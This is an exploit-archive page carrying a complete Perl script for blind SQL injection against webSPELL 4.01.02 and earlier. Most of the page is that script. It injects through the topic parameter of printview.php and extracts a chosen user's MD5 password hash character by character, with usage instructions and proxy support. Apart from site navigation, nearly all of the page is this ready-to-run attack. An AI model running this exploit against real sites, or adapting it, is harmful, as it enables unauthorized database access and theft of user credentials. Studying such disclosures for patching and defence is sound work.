webspell-sql.txt

webspell-sql.txt: Posted Feb 24, 2007; Authored by DNX; webSPELL versions 4.01.02 and below remote SQL injection exploit.; tags | exploit, remote, sql injection; SHA-256 | 7c807c519d7546a867aa112ace64dccde86e27c9a74c12c96c1630f57b2f037c; Download | Favorite | View

webspell-sql.txt

#!/usr/bin/perl
use LWP::UserAgent;
use Getopt::Long;

if(!$ARGV[2])
{
  print "\n                           \\#'#/                       ";
  print "\n                           (-.-)                        ";
  print "\n   -------------------oOO---(_)---OOo-------------------";
  print "\n   | webSPELL <= v4.01.02 (topic) Remote SQL Injection |";
  print "\n   |                   coded by DNX                    |";
  print "\n   -----------------------------------------------------";
  print "\n[!] Bug: in printview.php line 61, inject sql code in \$topic";
  print "\n[!] Solution: install security fix";
  print "\n[!] Usage: perl ws.pl [Host] [Path] [Topic] <Options>";
  print "\n[!] Example: perl ws.pl 127.0.0.1 /webspell/ -tid 1 -uid 2 -t my_user";
  print "\n[!] Options:";
  print "\n       -tid [no]     Valid topic-ID";
  print "\n       -uid [no]     User-ID, default is 1";
  print "\n       -t [name]     Changed the user table name, default is webs_user";
  print "\n       -p [ip:port]  Proxy support";
  print "\n";
  exit;
}

my $host    = $ARGV[0];
my $path    = $ARGV[1];
my $user    = 1;
my $table   = "webs_user";
my $topic   = 0;
my %options = ();
GetOptions(\%options, "tid=i", "uid=i", "t=s", "p=s");

print "[!] Exploiting...\n";

if($options{"tid"})
{
  $topic = $options{"tid"};
}
else
{
  print "[!] Exploit failed, missing parameter\n";
  exit;
}

if($options{"uid"})
{
  $user = $options{"uid"};
}

if($options{"t"})
{
  $table = $options{"t"};
}

syswrite(STDOUT, "[!] MD5-Hash: ", 14);

for(my $i = 1; $i <= 32; $i++)
{
  my $found = 0;
  my $h = 48;
  while(!$found && $h <= 57)
  {
    if(istrue3($host, $path, $table, $topic, $user, $i, $h))
    {
      $found = 1;
      syswrite(STDOUT, chr($h), 1);
    }
    $h++;
  }
  if(!$found)
  {
    $h = 97;
    while(!$found && $h <= 122)
    {
      if(istrue3($host, $path, $table, $topic, $user, $i, $h))
      {
        $found = 1;
        syswrite(STDOUT, chr($h), 1);
      }
      $h++;
    }
  }
}

print "\n[!] Exploit done\n";

sub istrue3
{
  my $host  = shift;
  my $path  = shift;
  my $table = shift;
  my $tid   = shift;
  my $uid   = shift;
  my $i     = shift;
  my $h     = shift;
  
  my $ua = LWP::UserAgent->new;
  my $url = "https://".$host.$path."printview.php?board=1&topic=".$tid."'%20AND%20SUBSTRING((SELECT%20password%20FROM%20".$table."%20WHERE%20userID=".$uid."),".$i.",1)=CHAR(".$h.")/*";
  
  if($options{"p"})
  {
    $ua->proxy('http', "https://".$options{"p"});
  }
  
  my $response = $ua->get($url);
  my $content = $response->content;
  my $regexp = "<b>Main Board</b>";
  
  if($content =~ /$regexp/)
  {
    return 1;
  }
  else
  {
    return 0;
  }
}

Top Authors In Last 30 Days

Red Hat 300 files
Ubuntu 63 files
Debian 20 files
LiquidWorm 19 files
Apple 9 files
Gentoo 5 files
Google Security Research 4 files
Alter Prime 3 files
Chokri Hammedi 3 files
nu11secur1ty 2 files

File Archives

Systems

AIX (430)
Apple (2,126)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,163)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,604)
HPUX (881)
iOS (393)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,928)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (17,326)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (9,981)
UNIX (9,474)
UnixWare (188)
Windows (6,784)
Other

webspell-sql.txt

webspell-sql.txt

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

webspell-sql.txt

Share This

webspell-sql.txt

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems